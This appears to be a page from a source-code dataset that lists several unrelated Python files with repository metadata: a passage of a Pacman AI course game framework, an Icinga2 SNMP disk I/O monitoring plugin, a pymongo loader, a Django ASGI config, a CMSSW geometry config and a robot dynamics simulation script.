return self.data.layout.walls
def hasFood(self, x, y):
return self.data.food[x][y]
def hasWall(self, x, y):
return self.data.layout.walls[x][y]
def isLose(self):
return self.data._lose
def isWin(self):
return self.data._win
#############################################
# Helper methods: #
# You shouldn't need to call these directly #
#############################################
def __init__(self, prevState=None):
"""
Generates a new state by copying information from its predecessor.
"""
if prevState != None: # Initial state
self.data = GameStateData(prevState.data)
else:
self.data = GameStateData()
def deepCopy(self):
state = GameState(self)
state.data = self.data.deepCopy()
return state
def __eq__(self, other):
"""
Allows two states to be compared.
"""
return hasattr(other, 'data') and self.data == other.data
def __hash__(self):
"""
Allows states to be keys of dictionaries.
"""
return hash(self.data)
def __str__(self):
return str(self.data)
def initialize(self, layout, numGhostAgents=1000):
"""
Creates an initial game state from a layout array (see layout.py).
"""
self.data.initialize(layout, numGhostAgents)
############################################################################
# THE HIDDEN SECRETS OF PACMAN #
# #
# You shouldn't need to look through the code in this section of the file. #
############################################################################
SCARED_TIME = 40 # Moves ghosts are scared
COLLISION_TOLERANCE = 0.7 # How close ghosts must be to Pacman to kill
TIME_PENALTY = 1 # Number of points lost each round
class ClassicGameRules:
"""
These game rules manage the control flow of a game, deciding when
and how the game starts and ends.
"""
def __init__(self, timeout=30):
self.timeout = timeout
def newGame(self, layout, pacmanAgent, ghostAgents, display, quiet=False, catchExceptions=False):
agents = [pacmanAgent] + ghostAgents[:layout.getNumGhosts()]
initState = GameState()
initState.initialize(layout, len(ghostAgents))
game = Game(agents, display, self, catchExceptions=catchExceptions)
game.state = initState
self.initialState = initState.deepCopy()
self.quiet = quiet
return game
def process(self, state, game):
"""
Checks to see whether it is time to end the game.
"""
if state.isWin():
self.win(state, game)
if state.isLose():
self.lose(state, game)
def win(self, state, game):
if not self.quiet:
print("Pacman emerges victorious! Score: %d" % state.data.score)
game.gameOver = True
def lose(self, state, game):
if not self.quiet:
print("Pacman died! Score: %d" % state.data.score)
game.gameOver = True
def getProgress(self, game):
return float(game.state.getNumFood()) / self.initialState.getNumFood()
def agentCrash(self, game, agentIndex):
if agentIndex == 0:
print("Pacman crashed")
else:
print("A ghost crashed")
def getMaxTotalTime(self, agentIndex):
return self.timeout
def getMaxStartupTime(self, agentIndex):
return self.timeout
def getMoveWarningTime(self, agentIndex):
return self.timeout
def getMoveTimeout(self, agentIndex):
return self.timeout
def getMaxTimeWarnings(self, agentIndex):
return 0
class PacmanRules:
"""
These functions govern how pacman interacts with his environment under
the classic game rules.
"""
PACMAN_SPEED = 1
def getLegalActions(state):
"""
Returns a list of possible actions.
"""
return Actions.getPossibleActions(state.getPacmanState().configuration, state.data.layout.walls)
getLegalActions = staticmethod(getLegalActions)
def applyAction(state, action):
"""
Edits the state to reflect the results of the action.
"""
legal = PacmanRules.getLegalActions(state)
if action not in legal:
raise Exception("Illegal action " + str(action))
pacmanState = state.data.agentStates[0]
# Update Configuration
vector = Actions.directionToVector(action, PacmanRules.PACMAN_SPEED)
pacmanState.configuration = pacmanState.configuration.generateSuccessor(
vector)
# Eat
next = pacmanState.configuration.getPosition()
nearest = nearestPoint(next)
if manhattanDistance(nearest, next) <= 0.5:
# Remove food
PacmanRules.consume(nearest, state)
applyAction = staticmethod(applyAction)
def consume(position, state):
x, y = position
# Eat food
if state.data.food[x][y]:
state.data.scoreChange += 10
state.data.food = state.data.food.copy()
state.data.food[x][y] = False
state.data._foodEaten = position
# TODO: cache numFood?
numFood = state.getNumFood()
if numFood == 0 and not state.data._lose:
state.data.scoreChange += 500
state.data._win = True
# Eat capsule
if(position in state.getCapsules()):
state.data.capsules.remove(position)
state.data._capsuleEaten = position
# Reset all ghosts' scared timers
for index in range(1, len(state.data.agentStates)):
state.data.agentStates[index].scaredTimer = SCARED_TIME
consume = staticmethod(consume)
class GhostRules:
"""
These functions dictate how ghosts interact with their environment.
"""
GHOST_SPEED = 1.0
def getLegalActions(state, ghostIndex):
"""
Ghosts cannot stop, and cannot turn around unless they
reach a dead end, but can turn 90 degrees at intersections.
"""
conf = state.getGhostState(ghostIndex).configuration
possibleActions = Actions.getPossibleActions(
conf, state.data.layout.walls)
reverse = Actions.reverseDirection(conf.direction)
if Directions.STOP in possibleActions:
possibleActions.remove(Directions.STOP)
if reverse in possibleActions and len(possibleActions) > 1:
possibleActions.remove(reverse)
return possibleActions
getLegalActions = staticmethod(getLegalActions)
def applyAction(state, action, ghostIndex):
legal = GhostRules.getLegalActions(state, ghostIndex)
if action not in legal:
raise Exception("Illegal ghost action " + str(action))
ghostState = state.data.agentStates[ghostIndex]
speed = GhostRules.GHOST_SPEED
if ghostState.scaredTimer > 0:
speed /= 2.0
vector = Actions.directionToVector(action, speed)
ghostState.configuration = ghostState.configuration.generateSuccessor(
vector)
applyAction = staticmethod(applyAction)
def decrementTimer(ghostState):
timer = ghostState.scaredTimer
if timer == 1:
ghostState.configuration.pos = nearestPoint(
ghostState.configuration.pos)
ghostState.scaredTimer = max(0, timer - 1)
decrementTimer = staticmethod(decrementTimer)
def checkDeath(state, agentIndex):
pacmanPosition = state.getPacmanPosition()
if agentIndex == 0: # Pacman just moved; Anyone can kill him
for index in range(1, len(state.data.agentStates)):
ghostState = state.data.agentStates[index]
ghostPosition = ghostState.configuration.getPosition()
if GhostRules.canKill(pacmanPosition, ghostPosition):
GhostRules.collide(state, ghostState, index)
else:
ghostState = state.data.agentStates[agentIndex]
ghostPosition = ghostState.configuration.getPosition()
if GhostRules.canKill(pacmanPosition, ghostPosition):
GhostRules.collide(state, ghostState, agentIndex)
checkDeath = staticmethod(checkDeath)
def collide(state, ghostState, agentIndex):
if ghostState.scaredTimer > 0:
state.data.scoreChange += 200
GhostRules.placeGhost(state, ghostState)
ghostState.scaredTimer = 0
# Added for first-person
state.data._eaten[agentIndex] = True
else:
if not state.data._win:
state.data.scoreChange -= 500
state.data._lose = True
collide = staticmethod(collide)
def canKill(pacmanPosition, ghostPosition):
return manhattanDistance(ghostPosition, pacmanPosition) <= COLLISION_TOLERANCE
canKill = staticmethod(canKill)
def placeGhost(state, ghostState):
ghostState.configuration = ghostState.start
placeGhost = staticmethod(placeGhost)
#############################
# FRAMEWORK TO START A GAME #
#############################
def default(str):
return str + ' [Default: %default]'
def parseAgentArgs(str):
if str == None:
return {}
pieces = str.split(',')
opts = {}
for p in pieces:
if '=' in p:
key, val = p.split('=')
else:
key, val = p, 1
opts[key] = val
return opts
def readCommand(argv):
"""
Processes the command used to run pacman from the command line.
"""
from optparse import OptionParser
usageStr = """
USAGE: python pacman.py <options>
EXAMPLES: (1) python pacman.py
- starts an interactive game
(2) python pacman.py --layout smallClassic --zoom 2
OR python pacman.py -l smallClassic -z 2
- starts an interactive game on a smaller board, zoomed in
"""
parser = OptionParser(usageStr)
parser.add_option('-n', '--numGames', dest='numGames', type='int',
help=default('the number of GAMES to play'), metavar='GAMES', default=1)
parser.add_option('-l', '--layout', dest='layout',
help=default(
'the LAYOUT_FILE from which to load the map layout'),
metavar='LAYOUT_FILE', default='mediumClassic')
parser.add_option('-p', '--pacman', dest='pacman',
help=default(
'the agent TYPE in the pacmanAgents module to use'),
metavar='TYPE', default='KeyboardAgent')
parser.add_option('-t', '--textGraphics', action='store_true', dest='textGraphics',
help='Display output as text only', default=False)
parser.add_option('-q', '--quietTextGraphics', action='store_true', dest='quietGraphics',
help='Generate minimal output and no graphics', default=False)
parser.add_option('-g', '--ghosts', dest='ghost',
help=default(
'the ghost agent TYPE in the ghostAgents module to use'),
metavar='TYPE', default='RandomGhost')
parser.add_option('-k', '--numghosts', type='int', dest='numGhosts',
help=default('The maximum number of ghosts to use'), default=4)
parser.add_option('-z', '--zoom', type='float', dest='zoom',
help=default('Zoom the size of the graphics window'), default=1.0)
parser.add_option('-f', '--fixRandomSeed', action='store_true', dest='fixRandomSeed',
help='Fixes the random seed to always play the same game', default=False)
parser.add_option('-r', '--recordActions', action='store_true', dest='record',
help='Writes game histories to a file (named by the time they were played)', default=False)
parser.add_option('--replay', dest='gameToReplay',
help='A recorded game file (pickle) to replay', default=None)
parser.add_option('-a', '--agentArgs', dest='agentArgs',
help='Comma separated values sent to agent. e.g. "opt1=val1,opt2,opt3=val3"')
parser.add_option('-x', '--numTraining', dest='numTraining', type='int',
help=default('How many episodes are training (suppresses output)'), default=0)
parser.add_option('--frameTime', dest='frameTime', type='float',
help=default('Time to delay between frames; <0 means keyboard'), default=0.1)
parser.add_option('-c', '--catchExceptions', action='store_true', dest='catchExceptions',
help='Turns on exception handling and timeouts during games', default=False)
parser.add_option('--timeout', dest='timeout', type='int',
help=default('Maximum length of time an agent can spend computing in a single game'), default=30)
options, otherjunk = parser.parse_args(argv)
if len(otherjunk) != 0:
raise Exception('Command line input not understood: ' + str(otherjunk))
args = dict()
# Fix the random seed
if options.fixRandomSeed:
random.seed('cs188')
# Choose a layout
args['layout'] = layout.getLayout(options.layout)
if args['layout'] == None:
raise Exception("The layout " + options.layout + " cannot be found")
# Choose a Pacman agent
noKeyboard = options.gameToReplay == None and (
options.textGraphics or options.quietGraphics)
pacmanType = loadAgent(options.pacman, noKeyboard)
agentOpts = parseAgentArgs(options.agentArgs)
if options.numTraining > 0:
args['numTraining'] = options.numTraining
if 'numTraining' not in agentOpts:
agentOpts['numTraining'] = options.numTraining
pacman = pacmanType(**agentOpts) # Instantiate Pacman with agentArgs
args['pacman'] = pacman
# Don't display training games
if 'numTrain' in agentOpts:
options.numQuiet = int(agentOpts['numTrain'])
options.numIgnore = int(agentOpts['numTrain'])
# Choose a ghost agent
ghostType = loadAgent(options.ghost, noKeyboard)
args['ghosts'] = [ghostType(i+1) for i in range(options.numGhosts)]
# Choose a display format
if options.quietGraphics:
import textDisplay
args['display'] = textDisplay.NullGraphics()
elif options.textGraphics:
import textDisplay
textDisplay.SLEEP_TIME = options.frameTime
args['display'] = textDisplay.PacmanGraphics()
else:
import graphicsDisplay
args['display'] = graphicsDisplay.PacmanGraphics(
options.zoom, frameTime=options.frameTime)
args['numGames'] = options.numGames
args['record'] = options.record
args['catchExceptions'] = options.catchExceptions
args['timeout'] = options.timeout
# Special case: recorded games don't use the runGames method or args structure
if options.gameToReplay != None:
print('Replaying recorded game %s.' % options.gameToReplay)
import pickle
f = open(options.gameToReplay, 'rb')
try:
recorded = pickle.load(f)
finally:
f.close()
recorded['display'] = args['display']
replayGame(**recorded)
sys.exit(0)
return args
def loadAgent(pacman, nographics):
# Looks through all pythonPath Directories for the right module,
pythonPathStr = os.path.expandvars("$PYTHONPATH")
if pythonPathStr.find(';') == -1:
pythonPathDirs = pythonPathStr.split(':')
else:
pythonPathDirs = pythonPathStr.split(';')
pythonPathDirs.append('.')
for moduleDir in pythonPathDirs:
if not os.path.isdir(moduleDir):
continue
moduleNames = [f for f in os.listdir(
moduleDir) if f.endswith('gents.py')]
for modulename in moduleNames:
try:
module = __import__(modulename[:-3])
except ImportError:
continue
if pacman in dir(module):
if nographics and modulename == 'keyboardAgents.py':
raise Exception(
'Using the keyboard requires graphics (not text display)')
return getattr(module, pacman)
raise Exception('The agent ' + pacman +
' is not specified in any *Agents.py.')
def replayGame(layout, actions, display):
import pacmanAgents
import ghostAgents
rules = ClassicGameRules()
agents = [pacmanAgents.GreedyAgent()] + [ghostAgents.RandomGhost(i+1)
for i in range(layout.getNumGhosts())]
game = rules.newGame(layout, agents[0], agents[1:], display)
state = game.state
display.initialize(state.data)
for action in actions:
# Execute the action
state = state.generateSuccessor(*action)
# Change the display
display.update(state.data)
# Allow for game specific conditions (winning, losing, etc.)
rules.process(state, game)
display.finish()
def runGames(layout, pacman, ghosts, display, numGames, record, numTraining=0, catchExceptions=False, timeout=30):
import __main__
__main__.__dict__['_display'] = display
rules = ClassicGameRules(timeout)
games = []
for i in range(numGames):
beQuiet = i < numTraining
if beQuiet:
# Suppress output and graphics
import textDisplay
gameDisplay = textDisplay.NullGraphics()
rules.quiet = True
else:
gameDisplay = display
rules.quiet = False
game = rules.newGame(layout, pacman, ghosts,
gameDisplay, beQuiet, catchExceptions)
game.run()
if not beQuiet:
games.append(game)
if record:
import time
import pickle
fname = ('recorded-game-%d' % (i + 1)) + \
'-'.join([str(t) for t in time.localtime()[1:6]])
f = open(fname, 'wb')
components = {'layout': layout, 'actions': game.moveHistory}
pickle.dump(components, f)
f.close()
if (numGames-numTraining) > 0:
scores = [game.state.getScore() for game in games]
wins = [game.state.isWin() for game in games]
winRate = wins.count(True) / float(len(wins))
print('Average Score:', sum(scores) / float(len(scores)))
print('Scores: ', ', '.join([str(score) for score in scores]))
print('Win Rate: %d/%d (%.2f)' %
(wins.count(True), len(wins), winRate))
print('Record: ', ', '.join(
[['Loss', 'Win'][int(w)] for w in wins]))
return games
if __name__ == '__main__':
"""
The main function called when pacman.py is run
from the command line:
> python pacman.py
See the usage string for more details.
> python pacman.py --help
"""
args = readCommand(sys.argv[1:]) # Get game components based on input
runGames(**args)
# import cProfile
# cProfile.run("runGames( **args )")
pass
| [
"[email protected]"
] | |
de57f86650cdd9a45c6f228f4187c4bd3a9c8820 | 092b656a7faefe6e9c7a8c91217ce4ee85f70fd9 | /sondes/check_disk_io.py | e6fdd261da650023310bb1ec8bbe663459faf567 | [] | no_license | aurimukas/icinga2_plugins | 39ca3d848fe24fd278b4b6adc1f26f0e341ca5d2 | fc8c808c46f65696f7c6ac8fd6266c1091dbb14d | refs/heads/master | 2021-01-18T21:44:14.442257 | 2016-11-18T10:40:35 | 2016-11-18T10:40:35 | 72,296,781 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,833 | py | #!/opt/venv/bin/python
# -*- coding: utf-8 -*-
""" Icinga2 Plugin: Check Disk I/O
Method to Monitor Machine's Memory
File name: check_disk_io.py
Author: Aurimas NAVICKAS
Date created: 03/11/2016
Python Version: 3.5.2
"""
import importlib
time = importlib.import_module('time')
rm = importlib.import_module('.request_manager', 'argoss_libs.snmp')
pd_class = importlib.import_module('.perfdata', 'argoss_libs.snmp')
PerfDataItem = pd_class.PerfDataItem
nagios = importlib.import_module('nagiosplugin')
logging = importlib.import_module('logging')
_log = logging.getLogger('nagiosplugin')
__author__ = "Aurimas NAVICKAS"
class CheckDiskIo(rm.RequestManager):
"""
Check Machine's Disk I/O Metrics Method
Extra parameters to pass:
:param --disk, -d: Disk name. Required
Static Parameters:
:param COMPARISON_TTL: a time in seconds which is used to set cache existence for the comparison\
data in redis.
"""
COMPARISON_TTL = 180
def __init__(self, params, *args, **kwargs):
"""
Class initialization.
:param params: Args list to pass to argsParser.
:param args: Extra Args
:param kwargs: Extra kwargs
"""
# Getting default args defined in RequestManager Class
argsp = self.default_args("Check Disk IO")
# Extra args definition
argsp.add_argument('--disk', '-d', required=True, type=str, help='Disk name')
# Parsing passed params with argsParser
self.pargs = argsp.parse_args(params)
# Redis key to store machine's disk IO comparison data
self.io_key = '{0.host}:check_disk_io:{0.disk}'.format(self.pargs)
# Indexes primary definition
indexes = {
'oids': ['.1.3.6.1.4.1.2021.13.15.1.1.2'],
'values': {}
}
# Setting current timestamp
timestamp = time.time()
# Perfdata definition
perfdata = [
# Time delta from Now and time cached in Redis of last check.
PerfDataItem(key='delta', return_value=False, value_type='%f', value=timestamp, priority=0,
calculation="delta-delta_cache"),
PerfDataItem(key='alert_ioread', oid='.1.3.6.1.4.1.2021.13.15.1.1.5', return_value=True, value_type='%f',
calculation="(alert_ioread-alert_ioread_cache)/delta", priority=0),
PerfDataItem(key='alert_iowrite', oid='.1.3.6.1.4.1.2021.13.15.1.1.6', return_value=True, value_type='%f',
calculation="(alert_iowrite-alert_iowrite_cache)/delta", priority=0),
]
# Setting PerfDataItems index_label to passed disk name
indexes['values'][self.pargs.disk] = None
for pd in perfdata:
if pd.return_value:
pd.index_label = self.pargs.disk
# Init a Super Class
super(CheckDiskIo, self).__init__(self.pargs.host, self.pargs.port, self.pargs.community, self.pargs.version,
indexes=indexes, perfdata=perfdata, *args, **kwargs)
def probe(self):
"""Query system state and return metrics.
This is the only method called by the check controller.
It should trigger all necessary actions and create metrics.
:return: list of :class:`~nagiosplugin.metric.Metric` objects,
or generator that emits :class:`~nagiosplugin.metric.Metric`
objects, or single :class:`~nagiosplugin.metric.Metric`
object
"""
# Updating Perfdata and indexes
try:
self.update_performance_data(force_update_perfdata_from_host=True)
except Exception as e:
raise nagios.CheckError("Memory Check Error. %s", e)
# Preparing perfdata data to cache for future runs
perfdata_to_cache = self.prepare_cache_perfdata(self.perfdata)
# Checking if we have a cached data from previous run
exists, contains = self.cache.check_if_exists_and_contains(self.io_key, value_type='val')
if exists:
# Getting cached data from Redis
c_perfdata = self.cache.get_pickled_dict(self.io_key)
if isinstance(c_perfdata, list) and len(c_perfdata):
# Applying cache data to perfdata
self.apply_cached_perfdata(c_perfdata)
# Setting a new cache data for next run
self.cache.set_pickled_dict(self.io_key, perfdata_to_cache, expire=self.COMPARISON_TTL)
if not exists:
# No data in Cache. Nothing to compare. Exit
raise nagios.CheckError('No Data to compare with')
# _log.debug(self.perfdata)
# Evaluate calculations defined in Perfdata
self.eval_expressions()
# Generate Nagios Metrics list and return it
return self.yield_metrics()
| [
"[email protected]"
] | |
65ef235b341a2ed53566a7829d43c72fb9f90c2d | c860a9e47bde57dcd79e56c4c37c7009241273a4 | /pymongo lab/load_blogs.py | c31af1f7fcc290845f4fdbfccdc02d22671bf01e | [] | no_license | Svanderest/PymongoLab | 7ff653a9dacf5bd0584bef0e872c22d6a0f15199 | 1ff6a0bae562d9a039dd0e6096357573075af094 | refs/heads/master | 2020-09-11T17:48:15.590278 | 2019-11-16T18:36:35 | 2019-11-16T18:36:35 | 222,143,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from pymongo import MongoClient
from blogs import blog_docs
mongo_client = MongoClient("localhost", 27017)
db = mongo_client.lab4
coll = db.blogs
result = coll.insert_many(blog_docs)
print(result)
| [
"[email protected]"
] | |
b5d1443e4df54b176657616d92dfbe081ce8b556 | 96d48a320ce5cc7ddcb4765a5590f26ce5dc6322 | /Masa1.py | 6da3a307cc92914e066ec321224b1331f65a2c81 | [] | no_license | xiaoxiaoniao1/python | 64d0b62a3bac7a46d0a9000b29874e7e9a55d97e | 88a3933923db66c565335888c293eaf45cdc7518 | refs/heads/master | 2021-06-08T13:56:14.171900 | 2021-05-26T06:23:12 | 2021-05-26T06:23:12 | 179,627,172 | 1 | 6 | null | 2019-04-20T19:48:34 | 2019-04-05T06:00:23 | Python | UTF-8 | Python | false | false | 201 | py | #code:UTF-8
import os
d = raw_input("dir:")
i = raw_input("s:")
a = os.listdir(d)
b = []
for i in a:
if 'p' in i:
b.append(i)
else:
continue
print(b)
| [
"[email protected]"
] | |
c19ff2aeb1e9f7c11f7efe6f7e5c6cf20d9c7498 | 23506d832dc5a96f51f74f4b70d2d97e9e61fcc1 | /SavedAndHealthy/asgi.py | 3c0d2867a38c9c1aaf8151ea773b367253a1c9c9 | [] | no_license | LuckyMyLove/SavedAndHealthy | c8f6714e78710c179c7453585eca7428fdd49cb7 | 7515b958afbc36e619f4150273b493e38cb61cc6 | refs/heads/master | 2023-05-02T04:01:31.069000 | 2021-05-25T17:44:49 | 2021-05-25T17:44:49 | 365,356,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
ASGI config for SavedAndHealthy project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SavedAndHealthy.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
57a098d0e612be1c8062d07da3a70e277c09f1d7 | d60fa37053a864b3d2e46c2d1b3d72b899743da9 | /SLHCUpgradeSimulations/Geometry/python/Longbarrel_cmsSimIdealGeometryXML_cff.py | 9fa1d317d0f31763fddbaf9440246ad58e1d0ec7 | [] | no_license | ikrav/cmssw | ba4528655cc67ac8c549d24ec4a004f6d86c8a92 | d94717c9bfaecffb9ae0b401b6f8351e3dc3432d | refs/heads/CMSSW_7_2_X | 2020-04-05T23:37:55.903032 | 2014-08-15T07:56:46 | 2014-08-15T07:56:46 | 22,983,843 | 2 | 1 | null | 2016-12-06T20:56:42 | 2014-08-15T08:43:31 | null | UTF-8 | Python | false | false | 1,204 | py | import FWCore.ParameterSet.Config as cms
# Mostly copied from Configuration/StandardSequences/python/Geometry_cff.py
# The R39F16 Version of the Phase 1 Pixel Upgrade
from SLHCUpgradeSimulations.Geometry.Longbarrel_cmsSimIdealGeometryXML_cfi import *
from Geometry.TrackerNumberingBuilder.trackerNumberingGeometry_cfi import *
# Reconstruction geometry services
# Tracking Geometry
from Geometry.CommonDetUnit.globalTrackingGeometry_cfi import *
#Tracker
from RecoTracker.GeometryESProducer.TrackerRecoGeometryESProducer_cfi import *
#Muon
from Geometry.MuonNumbering.muonNumberingInitialization_cfi import *
from RecoMuon.DetLayers.muonDetLayerGeometry_cfi import *
# Alignment
from Geometry.TrackerGeometryBuilder.idealForDigiTrackerGeometry_cff import *
from Geometry.CSCGeometryBuilder.idealForDigiCscGeometry_cff import *
from Geometry.DTGeometryBuilder.idealForDigiDtGeometry_cff import *
# Calorimeters
from Geometry.CaloEventSetup.CaloTopology_cfi import *
from Geometry.CaloEventSetup.CaloGeometry_cff import *
from Geometry.CaloEventSetup.EcalTrigTowerConstituents_cfi import *
from Geometry.EcalMapping.EcalMapping_cfi import *
from Geometry.EcalMapping.EcalMappingRecord_cfi import *
| [
"[email protected]"
] | |
ff433bd16b447291bfbea865eb9eb96f0b4bbd54 | a79c524cc2826580e3d6d779f79a2b5fd078197a | /RobotPy/application/design_kr1p5_450.py | 01af07d5a4223948214e8cfc4a03d29634bb2c49 | [] | no_license | wulidexixilian/robotdesign | 0fc63f37318fb68eb8168af6c2b74aa01f9cc3bd | 4ba0dc7360f854f6d7be88834fa996e23a348ff5 | refs/heads/master | 2018-09-19T06:01:18.987937 | 2018-08-06T07:57:31 | 2018-08-06T07:57:31 | 126,000,164 | 1 | 4 | null | 2018-06-06T07:02:48 | 2018-03-20T10:26:18 | Python | UTF-8 | Python | false | false | 2,188 | py | import numpy as np
import matplotlib.pyplot as plt
from model import m_simulation as sim
from rRobotDB import pt_micro450 as cfg
from utility.compare_with_OPC import compare
plt.close("all")
np.set_printoptions(suppress=True)
np.set_printoptions(precision=4)
# *** build robot ***
s = sim.Simulation()
s.set_gravity(9.8 * np.array([0, 0, -1]))
load_dauer3 = {
"cm": np.array([35, 0, 70])*1e-3, "m": 1.5,
"iT": np.array([1200, 1200, 1200, 0, 0, 0])*1e-6
}
s.build_robot(
cfg.structure_para,
cfg.mass_para,
cfg.motor_para,
cfg.friction_para,
cfg.gear_para,
load_dauer3
)
q = [0, 0, 0, 0, 0, 0]
q_dot_max = np.array([300, 300, 450, 550, 550, 700]) / 180 * np.pi
q_dot = q_dot_max * 0.01
q_ddot = np.array([0, 0, 0, 0, 0, 0])
rs = s.get_result()
stall_tau = rs.get_stall_torque(q_dot_max, load_dauer3)
s.load_gear_characteristic(cfg.gear_para, stall_tau['tau_joint'])
# *** kinematics ***
s.run_one_step(q, q_dot, q_ddot)
ax = s.snapshot()
s.show_cm(ax)
# *** inverse dynamic ***
percentage = 100 # amount of data to be simulated, 100% for all
trace_file = '../resource/trace/KR1_IPO/Test1_KRCIpo'
# *** load q(t) from trace file ***
s.load_trajectory(trace_file, percentage)
# *** inverse dynamic simulation ***
s.sim_inv_dynamic()
# *** animation ***
s.animate()
# *** result ***
rs = s.get_result()
motor_velocity_max = [
q_dot_max[i] * s.robot.drives[i].ratio / np.pi / 2 * 60 for i in range(6)
]
print('Achievable max motor velocity:\n', np.array(motor_velocity_max))
print('Zero position tcp: {}mm'.format(stall_tau['tcp']))
tau_stall_motor = stall_tau['tau_motor']
motor_percent = stall_tau['motor_percent']
print('Motor stall torque:\n {}Nm\n {}%'.format(tau_stall_motor, motor_percent))
print('Gear stall torque: {}Nm'.format(stall_tau['tau_joint']))
# rs.show_performance()
rs.drive_characteristic(30, 15, tau_stall_motor)
rs.get_max_drive_tau()
rs.joint_characteristic(cfg.gear_para)
rs.get_max_joint_tau()
gear_av_tau_percent = rs.gear_average_tau() /\
np.array([item['acc_tau'] for item in cfg.gear_para])
print('Gear average torque ratio: {}%'.format(gear_av_tau_percent * 100))
compare(s, trace_file, percentage)
plt.show(block=False)
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.